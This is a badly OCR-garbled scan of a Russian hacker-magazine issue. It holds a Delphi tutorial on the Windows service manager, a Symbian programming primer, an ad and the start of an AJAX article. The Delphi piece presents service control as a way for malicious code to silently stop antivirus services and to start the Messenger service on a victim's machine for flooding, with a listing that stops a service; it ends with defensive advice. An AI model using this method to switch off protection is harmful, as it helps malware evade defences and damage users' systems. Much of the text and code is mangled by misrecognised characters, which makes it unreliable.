анализатор антивируса не смог 
его найти. Самое простое и эффективное 
решение кроется в отключении сервиса ан- 
тивируса. Не знаю, как «Касперский» (давно 
его не юзал), а Зутапіес и Эг. ѴѴеЬ работают 
как сервисы, а значит, чтобы наш зло-код 
спокойно работал в системе, не боясь 
антисредств, достаточно просто отключить 
соответствующий сервис, и никто уже его не 
остановит. Самое поразительное, что можно 
создавать сервисы, которые невозможно 
вырубить, но известные мне антивирусы 
почему-то легко отключаются. Это вполне 
логично, ведь анализаторы иногда ошибают- 
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ся (сам с таким встречался), и тогда пользо- 
ватель должен иметь возможность отклю- 
чить слишком умный антивирус и позволить 
продолжить работу с программами, которые 
анализатор воспринял как зло. 

Еще пример. Когда-то мы писали о том, что 
сервис Меззепдег не безопасен и подвержен 
атаке флудом, поэтому его начали отключать. 
Но кто мешает нам написать небольшую про- 
грамму, которая будет запускать сервис на 
компьютере жертвы, чтобы потом его можно 
было атаковать флудом через ЫЕТ ЗЕШ :)? 
Итак, сегодня нам предстоит узнать, как 
можно запустить/остановить любой сервис 
в системе или вогнать в его паузу. Судя по 
названию рубрики, мы будем делать это 
программно с помощью ЭеІрЫ. 



О Менеджер сервисов 

Приступим. За управление сервисами в окнах 
отвечает менеджер сервисов (Зегѵісе СопігоІ 
Мападег, что на нашем великом и могучем 
означает «менеджер управления сервиса- 
ми»), Очень часто, в том числе и в докумен- 
тации МЗЭКІ, можно встретить сокращение 
ЗСМападег. 

Чтобы получить контроль над сервисами, для 
начала необходимо подключиться к ме- 
неджеру. Для этого используется функция 
ОрепЗСМападег, которая в общем виде 
выглядит так: 



РипсДіоп ОрепЗСМападег ( 
ІрМасДіпеЫаше , 
ІрОаДаЪазеЫате : РСДаг; 
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> Как всегда, разобраться с методами поможет файл помощи 



сЫОезігесІАссезз : БЖЖБ 
) : 5С_НАЫЭЪЕ; зібсаіі; 

Туту нас всего 3 параметра: 

1 . Имя компьютера, к менеджеру которого 
необходимо подключиться. Если есть права, 
то можно управлять даже удаленным ком- 
пьютером. Для подключения к локальному 
компьютеру этот параметр можно оставить 
нулевым. 

2. База данных, которая нас интересует. Этот 
параметр должен быть равен ЗЕРѴІСЕ5_ 
АСТІѴЕ_ЭАТАВА5Е или нулю. В обоих случаях 
результат один и тот же — выбирается актив- 
ная база данных. 

3. Флаг, определяющий желаемый доступ. 

В зависимости от прав, с которыми работает 
пользователь, можно указать различные 
флаги прав доступа к менеджеру сервисов. 
Нас интересует полный доступ, а значит, 
в третьем параметре необходимо указать 
ЗС_МАМАОЕЯ_АІ_І__АССЕЗЗ. Фулл акцесс 
будет возможен, только если компьютер 
работает под админом. Слава богам зато, что 
большинство ламеров работает именно под 
такими правами, особенно в ѴѴіпбоѵѵз Ноте 
Ебіііоп, где каждый юзер является локальным 
админом. 

Если программа работает с правами 
БосаІЗузіет, то можно указать следующие 
права доступа: 

• 5С_МАМАСЕР_С0ШЕСТ — разрешено 
подключение к менеджеру; 

• ЗС_МАМАСЕР_ЕМІІМЕРАТЕ_ЗЕРѴІСЕ — 
разрешено перечисление сервисов; 

• 5С_МАНАСЕР_00ЕРѴ_І_0СК_5ТАТ05 — 
разрешен запрос состояния; 

• 5ТАН0АР0_РІ0НТ5_РЕА0 — стандартные 
права чтения; 

• 5С_МАИ АСЕК_М00ІГѴ_В00Т_СОтС — 

разрешено изменение загрузки. 



Если функция отработала успешно и смогла 
подключиться, то результатом будет хэндл 
выбранной базы данных ЗС-менеджера. Если 
подключение невозможно, то результатом 
будет ноль. 

Итак, чтобы подключиться к менеджеру уп- 
равления сервисами налокальном компьюте- 
ре, достаточно написать следующий код: 

зегѵісетападег : Сагбіпаі; 




зегѵісетападег : =Ореп5СМападег (піі, 

п і 1 , 5 0_МАЫАСЕ К_АЬ Ъ_АС СЕ 33); 

еп й ; 

Рекомендую проверять результат на коррек- 
тность, потому что программа может не иметь 
прав для подключения с запрошенными 
привилегиями. 

□ Подключение к сервису 

К менеджеру мы подключились, теперь под- 
рубимся к необходимому сервису. Для этого 
используется метод ОрепЗегѵісе, который 
выглядит так: 

іипсііоп ОрепЗегѵісе ( 

ДЗСМападег: ЗС_НАЫОЪЕ; 

ІрЗегѵісеЫате : РСАаг; 

(ЩЩезігесІАссезз : ОТлГОКО 
) : ЗС_НАЫЭЪЕ; зібсаіі; 

Здесь у нас опять 3 параметра: 

1 . хэндл менеджера сервисов, который 
мы получили после выполнения функции 
ОрепЗСМападег; 

2. имя сервиса, которым нужно управлять; 

3. права доступа. 

В качестве прав доступа при подключении 
к сервису можно указывать: 



• 5ЕРѴІСЕ_АІ_І__АССЕ55 — полный доступ; 

• 5ЕРѴІСЕ_5ТАРТ — разрешить запуск 
сервисов; 

• 5ЕРѴІСЕ_ЗТ0Р — разрешить останавливать 
сервисы; 

• 5ЕРѴІСЕ_РА05Е_СОМТІНІ_ІЕ — разрешить 
вгонять сервис в паузу и возобновлять 
выполнение. 

Это основные права, которые тебе могут 
понадобиться. 

Если выполнение прошло успешно, в ка- 
честве результата функция возвращает 
хэндл сервиса. Если произошла ошибка, 
то результатом будет ноль. Обязательно 
проверяй на ошибку, ведь сервис может и не 
быть установлен, а значит, его невозможно 
будет открыть и впоследствии управлять им. 
Получается, что по наличию сервиса можно 
определить, какой антивирус стоит на ком- 
пьютере жертве. Если соответствующий сер- 
вис открылся, то его можно останавливать. 

□ Управление 

Ну что же, можно начинать управление. Дела- 
ется это с помощью функции: 

СопігоІЗегѵісе . 
іипсііоп СопігоІЗегѵісе ( 

ДЗегѵісе: ЗС_НАЫЕЪЕ; 
бмСопігоІ: ЭШКО; 

ѵаг ІрЗегѵісеЗЕаііиз : ТзегѵісеЗЕаЕиз 
) : ВООЬ; зісісаіі; 

И снова 3 магических параметра: 

1 . Хэндл сервиса, которым нужно управлять. 

2. Действие, которое нужно выполнить. 
Основные указываемые здесь команды — это: 

• 5ЕКѴІСЕ_С0НТЕОІ__5Т0Р — остановить 
сервис; 

• 5ЕКѴІСЕ_С0НТК0І__РА05Е — сделать паузу, 
скушать «Твикс»; 
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>Теперьты можешь написать собственную оснасткууправления сервисами 



Листинг 1 

ѵаг 

зегѵісетападег, зегѵісе: Сагсііпаі; 
зз: ЗЕКѴІСЕ _ ЗТАТІІЗ; 

Ьедіп 

// Открываем менеджер сервисов 
зегѵісетападег :=ОрепЗСМападег (піі, 
піі, ЗС _ МАЫАСЕК _ АЪЪ _ АССЕЗЗ); 

// Открываем сервис Меззепдег 
зегѵісе :=ОрепЗегѵісе 
(зегѵісетападег, 'Меззепдег', 

ЗЕКѴІСЕ _ АЪЪ _ АССЕЗЗ) ; 

// Проверяем на ошибочки 



• ЗЕКѴІСЕ ^ОІЧТЕОІ^СОМТІМІІЕ — продол- 
жить выполнение сервиса, который кушает 
«Твикс». 

3. Переменная типа ЗЕПѴІСЕ_5ТАТІІЗ, через 
которую мы получим последнее состояние 
сервиса. 

При остановке можно встретиться с одной 
серьезной проблемой. Если есть зависимые 
работающие сервисы, то остановить требуе- 
мый сервис будет невозможно. Необходимо 
определить зависимости и остановить все 
сервисы. Но об этом чуть ниже. 

□ Использование менеджера 

Теперь у тебя есть информация, необходи- 
мая, для того чтобы написать образец кода, 
который будет незаметно останавливать все, 
что мешает твоей программе. В листинге 1 ты 
можешь увидеть пример кода, останавливаю- 
щего сервис Меззепдег. 

Единственная нерассмотренная мной фун- 
кция, которая есть в этом примере, — это 
СІозеЗегѵісеНапсІІе (аналог СІозеНапсІІе). 

С ее помощью необходимо закрывать откры- 
тый нами хэндл сервиса или хэндл менедже- 
рауправления сервисами. 

Ах, чуть не забыл. Все функции работы 
с сервисами и менеджером описаны 
в модуле ѴѴіпЗѵс. раз, поэтому не забудь 
прописать его в разделе изез, иначе пример 
не скомпилируется. 

О Стартуем 

Обрати внимание, что при рассмотрении 
функции контроля СопігоІЗегѵісе я не привел 
флага, который отвечал бы за запуск сервиса. 
Нет, я не опустил его из-за ненадобности, 
просто за запуск отвечает совершенно дру- 
гая функция — ЗіагіЗегѵісе. 

ІипсЬіоп ЗЬагЬЗегѵісе ( 



ЬЗегѵісе: ЗС_НАЫЭЪЕ; 
бШишЗегѵісеАгдз : ОТлЮКІ); 
ѵаг ІрЗегѵісеАгдѴесЬогз : РсЬаг 
) : ВООЬ; зЬбсаІІ; 

Давай глянем на параметры этой функции. 

1 . Хэндл сервиса, который нужно запустить. 

2. Количество передаваемых аргументов. 
Они передаются в виде строк в третьем пара- 
метре функции. 

3. Массив из строк аргументов. Каждый 
элемент массива — это строка, которая 
заканчивается нулем. 

Не знаю, отчего в МісгозоЙ запуск серви- 
са выделили в отдельную функцию и не 
смогли все реализовать в универсальной 
СопігоІЗегѵісе. Мне кажется, что это связано 
с безопасностью, но когда кажется, нужно 
креститься. Оставим лишнюю функцию на 
совесть разработчиков, тем более что их 
совесть выдерживала и не такое :). 

Со стартом могут быть проблемы. Не каж- 
дый может это сделать, особенно если для 
корректной работы требуется запуск других 
сервисов. Если результат не нулевой (Ігие), то 
запуск произошел успешно, а если нулевой 
(іаізе), то произошла ошибка. 

□ Оснастим 

С помощью функций менеджера управления 
сервисов ты легко можешь написать собс- 
твенную оснасткууправления сервисами. 
Конечно, мы ещё не рассмотрели все 
функции ЗС-менеджера, потому что их очень 
много и вместить их в одну статью нереально, 
а растягивать на несколько — нет смысла. 
Поэтому, чтобы облегчить твое дальнейшее 
изучение этой темы, я сделаю краткий обзор 
функций, которые могут тебя заинтересовать. 
А дальше уже МЗОІМ тебе в помощь. 

• ОиегуЗегѵісеЗ^иг — запрашивает ин- 



іі зегѵісе=0 Ыіеп 
Ьедіп 

ЗЬсшМеззаде ('Ошибка'); 

ехіЬ; 

епб; 

// Останавливаем Меззепдег 
СопЬгоіЗегѵісе (зегѵісе, ЗЕКѴІСЕ 
СОЫТКОЬ _ ЗТОР, зз); 

// Закрываем сервис 
СІозеЗегѵісеНапсІІе (зегѵісе); 
епб; 
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> Сервис, который нужно тормознуть, чтобы 
отключить Рг. ѴѴеЬ 



> Оснастка «Сервисы» управляет сервисами теми же методами, 
которые мы рассматриваем в этой статье 



«НЕ ЗНАЮ, ОТЧЕГО 
В МІСВ050РТ ЗАПУСКСЕРВИ- 
СА ВЫДЕЛИЛИ В ОТДЕЛЬНУЮ 
ФУНКЦИЮ И НЕ СМОГЛИ ВСЕ 
РЕАЛИЗОВАТЬ В УНИВЕРСАЛЬ- 
НОЙ С0МТВ0І.5ЕВѴІСЕ» 



формацию о состоянии сервиса. У функции 
2 параметра: хэндл сервиса и переменная 
типа ЗЕВѴІСЕ_ЗТАТІІЗ, куда будет записан 
результат. 

• Сгеа^еЗегѵісе — создает сервис и добав- 
ляет его в базу данных определенного менед- 
жера управления сервисами. Параметров 

у этой функции много, поэтому сэкономим 
место. Да и инсталлировать сервисы просто 
и без этой функции, достаточно только запус- 
тить исполняемый файл. 

• С'еІб^еЗегѵісе — удаляет сервис. Параметр 
только один, и это хэндл удаляемого сервиса. 

• ЕпитЕерепгіеп^Зегѵісег — перечисляет 
все сервисы, которые зависят от 
указанного. Таким образом можно вычис- 
лить зависимости. 

• Се+5егѵісе&ігр1ауНэте — определяет 
дружественное имя сервиса, которое можно 
увидеть в оснастке служб. 

• ЕпигпЗегѵісе-гЗ^^иг — перечисляет все 
установленные сервисы из базы данных 

и возвращает для каждого из них текущее 
состояние. 

□ Реакция 

При работе с ЗС-менеджером нужно 
быть очень внимательными, потому что 
результат наступает не мгновенно. Если 
запустить пример, который ты найдешь на 
диске, и программно остановить сервис 
Меззепдег, то можно увидеть, что в оснастке 



«Сервисы» служба сообщений будет неко- 
торое время недоступна, так как система 
будет останавливать сервис, обновлять базу 
данных и т.д. 

Запуск и остановка служб из оснастки ра- 
боты с сервисами будут также происходить 
не сразу. В зависимости от многих факторов 
это может занять от нескольких секунд до 
нескольких минут. 

Так что не надейся, что выключенный 
программно антивирус тут же переста- 
нет сканировать и можно творить что 
угодно. 

□ Напутствие 

Для того чтобы зло-код не смог програм- 
мно отрубить антивирус и внедриться в твою 
систему, достаточно работать на компью- 



тере с правами простого пользователя, а не 
администратора. 

В этом случае код не сможет получить 
полного доступа к системе. Конечно, нет 
ничего невозможного — есть куча 
способов поднять права, но это весьма 
проблематично. Программное отключе- 
ние сервисов лишний раз подтверждает 
тот факт, что защиты в окнах просто не 
может быть, особенно если юзер работает 
под правами админа. Любая зло-программа 
может незаметно вырубить эту защиту и 
уничтожить компьютер бедного пользователя. 
Виноват останется все тот же бедный юзер, 
но что он может сделать в ѴѴіпбоѵѵз Ноте 
ЕсІШоп? 

Остается только пожелать тебе удачи. Наде- 
юсь, скоро увидимся. □С 
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ДМИТРИЙ «ОЕМ@Ы» ТАРАСОВ 

/ РМІТРУ ТАКАЗОѴу НОТМАІЬ.СОМ / 



Ольхл 5ѴМВІАЫ 




ВОЗЬМИ СВОЙ СМАРТФОН ПОД КОНТРОЛЬ 



ПОСЛЕ ПУБЛИКАЦИИ СТАТЕЙ «СМС-ШПИОНАЖ» В СЕНТЯБРЬСКОМ НОМЕРЕ «X» И «5УМВІАЫ ТІРЗ'КГТРІСКЗ» В ОКТЯБРЬСКОМ 
«СПЕЦЕ» Я ПОЛУЧИЛ МОРЕ ПИСЕМ С ПРОСЬБАМИ РАССКАЗАТЬ О ТОМ, КАК ИЗУЧИТЬ ОСНОВЫ КОДИН ГА ПОД СМАРТФОН Ы НА БАЗЕ 
5ѴМВІАІЧ И КАКОЙ ИНСТРУМЕНТАРИЙ ИСПОЛЬЗОВАТЬ. ЧТОЖЕ, ПО ПРОС ЬБ А мТРУДЯІЦЦХ СЯ Я И ОПИШУ ЭТОТ ТРУДОЕМКИЙ, 
НО ЗАХВАТЫВАЮЩИЙ ПРОЦЕСС СОЗДАН ИЯ ПРОГРАММЫ ДЛЯ СМАРТФОНА. 



ѴізиаІ 

ЗіисІіо.І\ІЕ1і2003 






г 5 
* 



С На чем писать? 

ОД 

ЗутЬіап 
можно пи- 
сать и на Яве, 
и на Си, и даже на РуіЬоп 
и С#. Но что касается 

Заѵа2МЕ, то ни быс- 
трота выполнения 



(к 










предоставля- 
емые этим языком 
разработчику, не явля- 
ются удовлетворительными. 
Аналогичная ситуация пока и с . 
І\ІЕТ для смартфонов. Про Питон, 
думаю, вообще говорить не стоит :). 

С++ же, в свою очередь, позволяет 
использовать ОС на полную катушку, 
поскольку сама ЗутЬіап и написана на этом 
могучем языке :). 

О ЗутЬіап бывают разные 

Как ты, наверное, знаешь, ОС ЗутЬіап — лишь 
основа программной части любого смартфона, 
предоставляющая необходимые для работы АРІ. Внешний 
вид же и способ взаимодействия с пользователем определяется 
одной из двух реализаций интерфейсных надстроек над ОС 
ЗегіезбО от компании КІокіа и ЫЮотЗопу Егісзоп. В этой статье 
я буду ориентироваться на разработку под ЗегіезбО, поскольку 
платформа ЫЮ хоть и вызывает восхищение с эстетической 
точки зрения, но практически ограничивается 3-4 моделями 
смартфонов от Зопу Егісзоп. К выпуску смартов же на 360 
подключились, помимо КІокіа, и такие скорострелы смар- 
тфоностроения, какЗатзипд и І_Ѳ. На сегодняшний день 
количество моделей на этой платформе перевалило за 50, 
что с успехом можно наблюдать в часы пик в метрополитене :). 

□ Инструментарий 

Определившись с языком, нужно разобраться со средой разра- 
ботки, которую мы будем использовать для создания проектов. 

На данный момент очень хорошо себя зарекомендовала связка 



+ СагЬісІе.ѴЗ. В ок- 
тябрьском «Спеце» мы уже 
писали о том, почему лучше 
использовать этот инстру 
ментарий. Поэтому здесь 
^Я я лишь напомню, что 

СагЬісІе.ѴЗ — надстрой 
ка над студией от компании 
Ыокіа. Взять ее можно на нашем 
Ш диске, либо на іогит.покіа.сот 

После установки студии и надстрой 
ки необходимо определиться, под какую 
версию ОС мы будем писать. На сегодняш 
ний моментходовыми являются версии 7.0, 8.0 
8.1 и 9.1 . Для каждой версии платформы есть свой 
набор инструментов, называемый ЗБК и включающий 
документацию, примеры кода, эмулятор смартфона на 
ПК и прочие тулзы, необходимые для сборки проекта 
По большому счету программа, написанная для ЗутЬіап 
7.0 с использованием соответствующего ЗБК, будет успеш 
но работать и на последующих версиях до 8.1 включительно 
(если не применять какие-нибудь специфические АРІ). ЗБК 
также есть на нашем диске и на Іогит.покіа.сот . Устанавливать это 
дело нужно на диск С (это важно), после чего появится директория 
видаС:/ЗутЬіап/Зегіез60/7.0/Ерос32. Вот в ней-то и нужно создавать 
проекты, чтобы компилятор и линковщик нормально работали. 

□ Из чего состоит проект на БутЫап? 

После установки необходимого инструментария надо разобраться, 
что есть что в минимальном проекте. Запускай среду и выбирай 
Ыеѵѵ ЗутЬіап РігЦесі в папке ѴізиаІІ С++ РпЦесі. Не забудь задать 
путь проекта в папке Ерос32. Далее в диалоговом окне выбирай 
ЗБК (если их в списке нет, то юзай кнопку ЕпаЫе/ОізаЫе ЗБК) 
и указывай тип проекта СІаззіс Рго]есІТетрІаІе — 360 ІН 

ЕІКОЫ СопігоІ-ВазесІ Арріісаііоп («НеІІо, ѴѴогІсІ»). После этого 
жми РіпізЬ, и среда сгенерирует тебе кучу разных непонятных 
классов и файлов в папке проекта. 

Предлагаю пройтись по папкам, которые создала студия, 
и посмотреть, что в них лежит. 

• АІГ — здесь по умолчанию хранится иконка приложения (в вари- 
анте для статусной панели программы и для меню смартфона). 
Обрати внимание, что, для того чтобы лого программки нормаль- 
но смотрелось в меню, необходимо для каждой картинки созда- 
вать черно-белую маску, где черным будет закрашена видимая 
(показываемая) часть. Часть картинки, выкрашенная в белый 
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ЗирегГепе.іІ* ) Зиреііопе.Іос | 5ир«(оп&Ю1 5утЬіал4.1ос 



ОКзеЪ_ I 

00000000 (^п^ідЙАКАСТ Е К_3 ЕТ ОТР8 

00000044 рЬіопе тепи. . .//&: Ехатріе 
00000033 пді ©_рорир_в иЬте пи_рапе_1 
ООООООСС пи ехі^ . . ЙМеГіпе дГп_арр1 
00000110 г Гог арр, . #<іеГіпе дЬ п_ар 
00000154 арр_зЬо гісар^ іоп_зі гіпд 
00000133 1 егаеп^Нат© > _Х . % хЪ , , #сі©Гі п© 



> Те самые 3 символа мусора 




> Создание проекта 



фон темы оформления, установленной на смартфоне. 
Советую подробнее посмотреть документацию по Віітар 
и утилите АіТТооІ. 

Кроме того, в этой папке еще есть файл аіФресурсов 
приложения, имеющий примерно такой вид: 



#іпс1исіе <аіі:Ьоо1 .гП> 

КЕЗОІШСЕ АІЕ _ БАТА 
{ 

арр _ иіб=0х01ТТ9а56; //БІБ приложения 
пит _ ісопз=2; //количество иконок 



Ш 



• ОАТА — в этой директории хранятся файлы ресурсов 
приложения, являющиеся очень важной частью любой 
0111-программы для 8утЬіап. В ресурсах определяются 
строки, пункты и структура меню, внешний вид статус- 
ной панели приложения, структура списков и других 
контролов. Описание любого ресурса начинается 
с ключевого слова РЕЗОЕІРСЕ. К примеру, простейшее 
меню, вызываемое при нажатии левой функциональной 
кнопки, описывается следующим образом: 

КЕЗОІШСЕ МЕШ _ РАШ г _ зушЬіапЗ _ шепи 
{ 

ібетз = 

Е 

МЕШ _ ІТЕМ { соттапб = ЕЗутЪіапЗСтбАррТезЬ; 
ЬхЬ = дбп _ аррі _ ЬезЬ; }, 

МЕШ _ ІТЕМ { сошшапсі = ЕАкпСтбЕхіЬ; ЬхЬ = 
дбп _ аррі _ ехік; } 

ь- " 

■ 



зПогЬсарЫоп = дбп _ арр _ зПогЬ _ сарЫоп _ 
зкгіпд; //Короткая подпись приложения 

I 

• СВОІІР — здесь лежат файлы, необходимые для сборки 
проекта. Наибольший интерес представляет файл с рас- 
ширением ттр. Это файл описания проекта, из которого 
линковщик берет все пути подключаемых библиотек, 
хедеров и т. д. Рекомендую ознакомиться со структурой 
ММРи почитать документацию. 

Хочу обратить внимание на следующий факт: часто 
при добавлении нового функционала в приложение 
необходимо использовать какой-либо класс, требующий 
подключения определенного хедера и библиотеки. Соот- 
ветственно, эту библиотеку нужно прописывать в ттр- 
файл следующим образом: ЫВВАВУ тедаІіЬ.ІІЬ. При 
этом в ѴЗ наблюдается такой глюк: при сборке проекта, 
если она до этого уже производилась, иногда появляется 
сообщение об ошибке, в котором говорится о том, что 
требуемая библиотека не подключена, хотя это не так! 

В подобных случаях нужно делать ВеВиіІб Зоіиііоп. Если 
и это не помогает, можно попробовать реимпортировать 
свой проект. То же самое касается и файлов ресурсов: 
если ты видишь, что изменения в них никак не отражают- 
ся на сборке, сделай ребилд. 

• ІИС — здесь располагаются хедеры использу- 
ющихся в проекте классов. Стоит отметить, что 

в ЗутЬіап С + + принята очень полезная практика 
— для каждого более-менее значимого класса созда- 
вать отдельную пару «хедер — срр‘шник». Кроме 
того, в этой папке имеется файл с расширением ЬгЬ, 
в котором содержится перечисление всех юзерских 
команд, вызываемых при выборе определенного 
пункта меню: 



Здесь МЕКІІИТЕМ соответствует каждому новому пункту 
меню; соттапсі — идентификатор команды, вызыва- 
емой при выборе соответствующего пункта меню, а М 
— подпись пункта. Ресурс сарііоп’а приложения выне- 
сен в отдельный файл и имеет такой вид: 


епшп ТХаСошшапсіІсіз 

г 


стб тутопеу=1. 


стб туапкеба. 


стб туапкеЬа ѵі еѵг, 


стб туапкеЬа сбапде. 


КЕЗОІШСЕ САРТІСЖ _ БАТА. 


стб зЬоѵтабѵ, 


{ 


стб саЪ, 


//Подпись приложения 


стб Пібе 


сарііоп = дЬп арр сарЬіоп збгіпд; 


ь- 




> ЬНр://сІиЬ60.огд 

— пожалуй, единствен- 
ный стоящий источник 
информации о ЗутЬіап 
на русском языке. 
ЬНр://Ыеуу1-С.сот 

— весьма познаватель- 
ный ресурс. 
ГіДр://сІізси53Іоп1огит. 
покіа.сот — здесь 
можно найти решение 
практически любой 
проблемы. 




> На диске ты найдешь 

необходимый 

инструментарий. 
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> Воттак выглядит стол разработчика под ЗутЬіап 



Чтобы избежать всяких дурацких ошибок при 
сборке, важно не забывать вносить сюда все 
новые команды. 

Тут же лежит файл, содержащий локализован- 
ные версии строк, используемых в приложении 
для подписей, лейблов, диалогов и т. д. Как пра- 
вило, такой файл состоит из строк вида: 

#бейпе саркіоп _ стб _ Еікіе «Прога» 
#беНпе саркіоп _ стб _ ехіР «Выход» 

• 313 — тут находится ркр-файл, содер- 
жащий информацию, необходимую для 
сборки приложения, включая универсальный 
идентификатор приложения и пути файлов, 
которых надо поместить в сборку (картинки, 
ресурсы и т. д.). 

Так, например, в строке вида «"С:\ЗутЬіап\ 
Зегіез60\7.0\Ерос32\геІеазе\ШитЬ\игеІ\ 
ЗутЬіап4.арр»-» ! :\зуз{ет\аррз\ЗутЬіап4\ 
ЗутЬіап4.арр"» мы указываем, что файл 
ЗутЬіап4.арр будет установлен в директо- 
рию зузіетХаррз в смартфоне. 

Сама сборка, то есть установочный зіз-файл, 
окажется в рассматриваемой папке. 

• 5КС — тут все просто: сорцы используемых 
в программе классов. 

□ Базовые классы проекта 

Элементарный ЗутЬіап-проект состоит из 
следующих классов: 

• Аррііса+іоп — содержит точку входа и со- 
здает класс Эоситепі; 

• воситеп* * — задает некоторые свойства 
приложения (видимость/невидимость, напри- 
мер) и создает класс АррІІІ; 

• АррІЛ — формирует интерфейс пользова- 
теля и обрабатывает события (выбор пункта 
меню, элемента списка и т. д.), а также 
создает класс Сопіаіпег; 

• Соп+аіпег — класс, служащий контейнером 
для контролов (списки, редакторы и т. д.), 

а также отвечающий за их перерисовку 
и настройку. 

Думаю, на начальном уровне особый интерес 
представляет класс АррІЛ , поскольку он дает 
возможности обработки событий и команд 
пользователя. Рассмотрим, например, как 
обрабатывается выбор пункта меню. Как ты 



помнишь, в файле ресурсов содержится 
идентификатор команды, генерируемой 
при выборе каждого пункта. За перехват 
и обработку этих команд отвечает метод 
НапсПеСоттапсИ. класса АррІЛ . Код обработ- 
ки выглядит так: 

ѵоісі СХаАрріЛ : :Напб1еСоттапсіЬ (ТІпк 
аСошшапб) { 

зміРсЪ. ( аСошшапб ) { 
сазе сгпсі _ ІігзР: 

< 

//какой-то код 

I 

Ьгеак; 

сазе стЬ. _ Дісіе: 

< 

ЕхіР(); //выход 

> 

Ьгеак; 

сазе ЕАкпЗоРЬкеуВаск: 
сазе ЕЕікСтсіЕхіЬ: 

< 

// обработка нажатия на правую 
// клавишу «Васк» 

ЕхіЬ () ; 

Ьгеак; 

) 

ЬеРаиІЬ: 

Ьгеак; 

Н 

Кроме этого метода, АррЫі предоставляет 
еще множество полезных методов и свойств, 
почитать о которых стоит в ЗЭК Неір. 

Кстати, основной проблемой кодингапод 
ЗутЬіап является полное отсутствие визуаль- 
ное™, к которой нас приучили такие среды, 
как ЭеІрЬі и ѴЗ.ІЧЕТ. Другими словами, весь 
код придется набирать ручками, и, чтобы этом 
в деле не ошибиться, нужно хорошо разби- 
раться в С++. Весь кодинг объектно-ориенти- 
рованный, поэтому его основные парадигмы 
нужно знать и принимать всем сердцем :). 

□ Использование русских строк в ресурсах 

Рано или поздно ты наверняка захочешь ис- 
пользовать в названии программы, подписях 
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и т. д. кириллицу. Если просто взять и за- 
фигачить ее в файлы ресурсов, то вместо 
русских букв на экране смартфона будут 
в лучшем случае квадратики, а в худшем 
— вообще какой-нибудь ужас. Чтобы этого 
не произошло, нужно в файле ресурсов 
вверху написать «СНАВАСТЕВ_ЗЕТ ІІТР8» . 
После этого файл ресурсов необходи- 
мо сохранить в кодировке иіІ-8, с чем 
справится великий и могучий Блокнот. Все 
вроде бы хорошо, но, после того как ты 
проделаешь эту операцию, проект у тебя не 
соберется :). Виной тому будут 3 служебных 
символа, добавленных Блокнотом в начало 
файла ресурсов. Их нужно убрать любым 
НЕХ-редактором. 

В результате проект запустится, и ты смо- 
жешь наслаждаться нормальным русским 
текстом на экране мобилы. 

□ Особенности кодинга под ЗутЬіап 9.1 

После выхода новой версии операционки, 
жизнь кодеров под ЗутЬіап несколько ус- 
ложнилась, что во многом связано с вводом 
новой платформы безопасности ЗутЬіап 
ЗідпесІ. Теперь любое приложение для 
девятой версии, должно быть подписано 
цифровым сертификатом. Сертификат бы- 
вает трех типов: сертификат разработчика, 
позволяющий использовать любые АРІ, но 
только на телефоне самого разработчика 
(привязка к ІМЕІ); бесплатный сертификат, 
позволяющий использовать лишь ограни- 
ченный набор АРІ, гарантирующий, что ты 
не впариваешь потребителю троян; серти- 
фикат, позволяющий использовать любые 
АРІ. Последний выдается только после того, 
как приложение пройдет проверку парней 
из ЗутЬіап, которая стоит денег. 

Кроме того, изменились компилятор и лин- 
ковщик, поэтому в любом случае проекты, 
создававшиеся для более ранних платформ, 
необходимо перекомпилировать с использо- 
ванием нового ЗЭК. Подробнее об измене- 
ниях в новой версии можно прочитать на 
ѵѵѵѵѵѵ.зо1оѵік.ги/са1аІоа/геѵіеѵѵз/з60 
ЗгсІ-геѵ.ЫтІ . 



□ Несколько слов напоследок 

Естественно, для полного изложения 
основ кодинга под ЗутЬіап не может хва- 
тить одной статьи, поэтому здесь я привел 
только ключевые моменты, с которыми 
сталкивался сам. 

В качестве напутствия могу посоветовать 
читать больше документации, штудировать 
хелп и іогит.покіа.сот . И-Е 



ХАКЕР 12/96/ 06 





Побывал в далеких странах? 
Накопилось много интересных 
фотографий? 



Создай свой цифровой фотоархив на 

НОТр://{оіо.таіІ.гц/ и покажи друзьям! 

1. Доступ из любой точки мира 

2. Удобная система альбомов 

3. Редактирование фотографий 

4. Возможность ограничения доступа только для друзей 

5. Рейтинги лучших фотографий 

6. Творческие конкурсы с призами 



ФотоОтаіІ.гі/ 

Ваш личный цифровой фотоархив! 






КОЗЫРНЫЕ 

РАСКЛАДЫ 



Технология а^х для создания 

СОВРЕМЕННЫХ ВЕБ-САИТОВ 






В ПОКЕРЕ ЕСТЬ ТАКАЯ НАЧАЛЬНАЯ КОМБИНАЦИЯ КАРТ -ТУЗ И ВАЛЕТ. ЕЕ НАЗЫВАЮТ «АЧАХ». ЕСЛИ ОНА ВЫПАДАЕТ ПРИ РАЗДА- 
ЧЕ, ТО ШАНСЫ НА ВЫИГРЫШ ОЧЕНЬ ВЕЛИКИ. СУЩЕСТВУЕТ ОДНОИМЕННАЯ КОМПЬЮТЕРНАЯ ТЕХНОЛОГИЯ, КОТОРАЯ ОБЕЩАЕТ 
СТАТЬ КОЗЫРНОЙ КАРТОЙ В КОЛОДЕ ЛЮБОГО САЙТА. 



Теория 

начале — пара слов про техноло- 
гии, которые мы будем исполь- 
зовать в статье. Чтобы писать 
полноценные веб-приложения 
на Аяксе, надо на приличном уровне знать 
и уметь применять: 

• язык разметки гипертекста НТМЬ, а лучше 
ХНТМЬ; 

• каскадные таблицы стилей СЗЗ; 

• объектную модель БОМ; 

• язык программирования на стороне клиен- 
та, обычно ЧаѵаЗсгірІ; 

• объект ХМЬНирВециез! для обмена данны- 
ми с сервером; 

• ХМІ_ для формирования данных, либо 
другой формат, например ЧЗОІЧ. 



Если в вышеперечисленном списке 
встретились незнакомые слова, то не 
стоит отчаиваться — я поясню их, когда это 
понадобится. 

Общая схема работы 

Пользователь заходит на страничку, сде- 
ланную при помощи Аякса, и производит 
некое действие, например кликает мышкой 
по ссылке. Обработчик этого события 
посылает запрос на сервер. Он получает 
информацию и посылает ответ, который 
обрабатывает соответствующая функция 
на стороне клиента. Эта функция форми- 
рует готовый НТМЬ и показывает его поль- 
зователю. В общем, достаточно простая 
схема. Изучим детали. 



ХМЬННрВеяиез* 

Для того чтобы написать наше первое 
приложение — интерактивную страничку 
на АЧАХ, нам надо научиться пользовать- 
ся объектом ХМЬНирВециезЬ Что может 
быть проще, чем создать объект нужно- 
го класса? Но вспомним главную беду 
веб-программистов: у всех пользовате- 
лей разные браузеры. Місгозоіі Іпіегпеі 
Ехріогег поддерживает ХМЬНирВециез! 
в виде АсііѵеХ-объекта МісгозоЮ 
